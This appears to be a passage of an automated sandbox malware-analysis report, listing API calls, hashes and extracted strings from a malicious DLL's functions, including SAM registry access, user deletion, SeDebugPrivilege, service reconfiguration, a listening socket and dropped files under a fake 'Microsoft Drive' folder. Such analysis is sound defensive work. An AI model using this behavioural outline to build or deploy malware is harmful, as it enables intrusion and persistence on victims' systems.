                                                  • Opcode Fuzzy Hash: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                  • Instruction Fuzzy Hash: 6051493A7046544BCB18DF38B8901AFB7D1FF89260B9985AEFD8AD7341CA21ED01C764
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BA5E
                                                  • Process32First.KERNEL32(00000000,?), ref: 1000BA73
                                                  • GetLastError.KERNEL32(00000000,?), ref: 1000BA80
                                                  • _wcsupr.MSVCRT ref: 1000BA9D
                                                  • _wcsupr.MSVCRT ref: 1000BAA6
                                                  • wcsstr.MSVCRT ref: 1000BAAA
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000BACD
                                                  • _strlwr.MSVCRT ref: 1000BAE7
                                                  • _strlwr.MSVCRT ref: 1000BAEA
                                                  • strstr.MSVCRT ref: 1000BAF2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000BB01
                                                  • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1000BB0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$Next_strlwr_wcsupr$CloseCreateErrorFirstHandleLastSnapshotToolhelp32strstrwcsstr
                                                  • String ID:
                                                  • API String ID: 146143966-0
                                                  • Opcode ID: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                  • Instruction ID: 58f6ba2257750e6ab45c168541484ccfaec70cf465e469f9539c8ec9d4fa11c7
                                                  • Opcode Fuzzy Hash: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                  • Instruction Fuzzy Hash: 6D11B6762003156BF350EBB59C85EEB7B9CEFC1390F850929FD05C2145EB39E90886B1
                                                  APIs
                                                  • NetUserDel.NETAPI32(00000000,00000000), ref: 10025C48
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 10025C50
                                                  • wsprintfA.USER32 ref: 10025C98
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10025CB8
                                                  • Sleep.KERNEL32(00000032), ref: 10025CC4
                                                  • RegQueryValueExA.ADVAPI32 ref: 10025CF1
                                                  • RegCloseKey.ADVAPI32(1012B024), ref: 10025CFC
                                                  • wsprintfA.USER32 ref: 10025D11
                                                    • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                    • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Localwsprintf$#825CloseFreeOpenQuerySizeSleepUserValue
                                                  • String ID: %08X$SAM\SAM\Domains\Account\Users\Names\%s
                                                  • API String ID: 2119749478-1111274145
                                                  • Opcode ID: 8633236df80041a6d746a513e3dfe6e9c440722c7b8ff1fe9009a88f8ae055c0
                                                  • Instruction ID: 953d10763634fda03d780101f249e3d08da98c717480f8543807abe27b9f4de5
                                                  • Opcode Fuzzy Hash: 8633236df80041a6d746a513e3dfe6e9c440722c7b8ff1fe9009a88f8ae055c0
                                                  • Instruction Fuzzy Hash: 1A31E7752043056FE210DB24AC85FAB77D8EBC5255F80092DF94692282EA76E90C86A6
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B634
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000B6A9
                                                  • GetFileSize.KERNEL32 ref: 1000B6BC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1000B6D0
                                                  • lstrlenA.KERNEL32(?), ref: 1000B6DE
                                                  • #823.MFC42(00000000), ref: 1000B6E7
                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 1000B70D
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 1000B716
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B71D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$lstrlen$#823CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                  • String ID: .key
                                                  • API String ID: 2856261289-343438762
                                                  • Opcode ID: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                  • Instruction ID: bd8e3325d0db8e7463eafbc11f0d66b84d6b493b70728e4679981c1757bf8fad
                                                  • Opcode Fuzzy Hash: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                  • Instruction Fuzzy Hash: A0215C752006042BF724DA789C8AFAB3A89FB84760F580739FE57D71D1DEA49D088760
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: WINMM.dll$waveOutGetNumDevs$waveOutOpen$waveOutPrepareHeader
                                                  • API String ID: 2574300362-4065288365
                                                  • Opcode ID: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                  • Instruction ID: 97c40741ceac41b55f427a3e19617a04594bb35f0b993fe0b131869bec9d13a6
                                                  • Opcode Fuzzy Hash: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                  • Instruction Fuzzy Hash: C5212676600204ABDB10DF68EC84AA67BE8FFC8310F154469EB049B301D736E945DBE0
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000E5EA
                                                  • lstrlenA.KERNEL32 ref: 1000E609
                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 1000E612
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000E619
                                                  • RegCreateKeyA.ADVAPI32(80000001,TGByte\Setup,?), ref: 1000E62E
                                                  • RegSetValueExA.ADVAPI32(00000000,Host,00000000,00000001,?), ref: 1000E650
                                                  • RegCloseKey.ADVAPI32(?), ref: 1000E65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateFile$HandleValueWritelstrlen
                                                  • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                  • API String ID: 1763583472-3579490797
                                                  • Opcode ID: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                  • Instruction ID: 77af767004de95c6ec99707751be97fa26c4c007db1504f7e5df3f5080d650d4
                                                  • Opcode Fuzzy Hash: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                  • Instruction Fuzzy Hash: 9E11A375100310BBE320DB68CC49FEB7BADFB89751F044A18F659A21D0DBB4A8058BA2
                                                  APIs
                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 10023D9A
                                                  • _errno.MSVCRT ref: 10023DA4
                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 10023DBC
                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 10023DD2
                                                  • recvfrom.WS2_32(00000010,?,00001FF6,00000000,?,00000010), ref: 10023E0C
                                                  • inet_addr.WS2_32(00000000), ref: 10023E8D
                                                  • htons.WS2_32(?), ref: 10023E9C
                                                  • Sleep.KERNEL32(00000005), ref: 10023ECC
                                                  • Sleep.KERNEL32(00000005,?,?), ref: 10023F37
                                                  • closesocket.WS2_32 ref: 10023F4C
                                                  • closesocket.WS2_32(?), ref: 10023F52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleepclosesocket$_errnohtonsinet_addrrecvfromselect
                                                  • String ID:
                                                  • API String ID: 1415794423-0
                                                  • Opcode ID: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                  • Instruction ID: 526c464df8ce17cb72c57ff37cbb3dc0b2e5127f8a28d9ed385b909f9f69fec1
                                                  • Opcode Fuzzy Hash: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                  • Instruction Fuzzy Hash: F461A074508381ABD710CF24EC44AABB7F4FFC4714F408A2EF99997250E774D9098B66
                                                  APIs
                                                  • strchr.MSVCRT ref: 10023B29
                                                  • atoi.MSVCRT(?), ref: 10023B56
                                                  • strchr.MSVCRT ref: 10023B98
                                                  • strncpy.MSVCRT ref: 10023BCF
                                                  • strchr.MSVCRT ref: 10023BDB
                                                  • strncpy.MSVCRT ref: 10023C03
                                                  • strncpy.MSVCRT ref: 10023C1F
                                                  • InitializeCriticalSection.KERNEL32(1012C4C8), ref: 10023C86
                                                    • Part of subcall function 10023A10: WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                    • Part of subcall function 10023A10: socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                    • Part of subcall function 10023A10: htons.WS2_32 ref: 10023A68
                                                    • Part of subcall function 10023A10: bind.WS2_32 ref: 10023A83
                                                    • Part of subcall function 10023A10: listen.WS2_32(00000000,00000032), ref: 10023A94
                                                  • WSACleanup.WS2_32 ref: 10023C91
                                                  • DeleteCriticalSection.KERNEL32(1012C4C8), ref: 10023C9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strchrstrncpy$CriticalSection$CleanupDeleteInitializeStartupatoibindhtonslistensocket
                                                  • String ID:
                                                  • API String ID: 2616448033-0
                                                  • Opcode ID: 55b51d6532b0de008f3ed0ddd65bbc0284a31802f93f59684aeb0db7c36dd63e
                                                  • Instruction ID: f0911b4fec8e4266fbad34e6581986e1c1ae1dffaf00490737ab10f6ce092d50
                                                  • Opcode Fuzzy Hash: 55b51d6532b0de008f3ed0ddd65bbc0284a31802f93f59684aeb0db7c36dd63e
                                                  • Instruction Fuzzy Hash: 7541CE365046081BD32C9A789C558BB7BD5FBC4320F554B2EFA2B936D0DEB4AE088694
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                  • String ID:
                                                  • API String ID: 3289936468-0
                                                  • Opcode ID: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                  • Instruction ID: c614f76b29358a3fda3e897671393add0d389b4ba00e88ce342a7451a82b3d62
                                                  • Opcode Fuzzy Hash: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                  • Instruction Fuzzy Hash: 8241E8B4D046559FF721CF188C447AEBBE4FB0A6E0F14066AE8D5A3645C3344A02CFA6
                                                  APIs
                                                  • #540.MFC42 ref: 10011358
                                                  • #858.MFC42(00000004), ref: 10011376
                                                  • #922.MFC42(?,00000000,00000000,?,?,?,?), ref: 100113A9
                                                  • #858.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113B8
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113C6
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113D4
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113E1
                                                  • #939.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011409
                                                  • #800.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011416
                                                  • #535.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011426
                                                  • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011438
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$#858$#535#540#922#939
                                                  • String ID:
                                                  • API String ID: 1721966335-0
                                                  • Opcode ID: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                  • Instruction ID: 1068962097da1abb9be03f2cf21bec5754a184422a1b80b0b6d5662a040d76a2
                                                  • Opcode Fuzzy Hash: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                  • Instruction Fuzzy Hash: 7D319A79108381ABC305DB68D551F9FBBE9EF98A14F400A1DF49993282DB34E608C767
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000008), ref: 100196A1
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000002), ref: 100196D9
                                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 100196E2
                                                  • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019728
                                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10019733
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019740
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019743
                                                  • Sleep.KERNEL32(000000C8), ref: 1001974A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseDatabaseHandleProcess$ChangeConfigCurrentLockManagerSleepTokenUnlock
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2207141857-2896544425
                                                  • Opcode ID: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                  • Instruction ID: dc65207eb95ef46fdda0787c0b6e18c9b4e2414683cc893defa47448b081054d
                                                  • Opcode Fuzzy Hash: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                  • Instruction Fuzzy Hash: D2213D3925411467E320AB789C4AFEB3B98FB94760F140326FA199B2C1DD74EC448675
                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAA6
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAE3
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAF3
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB0A
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                  • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                  • API String ID: 1069036285-946259135
                                                  • Opcode ID: 3ef40e1b24012dc33a54d2610ee3cd82b13cfcf054cf135e9c6401c4dca04a34
                                                  • Instruction ID: 5292a9c2d9f8cb6fc371b91f45e4bc5e063248a78d6024cb8ab5bb5854198aeb
                                                  • Opcode Fuzzy Hash: 3ef40e1b24012dc33a54d2610ee3cd82b13cfcf054cf135e9c6401c4dca04a34
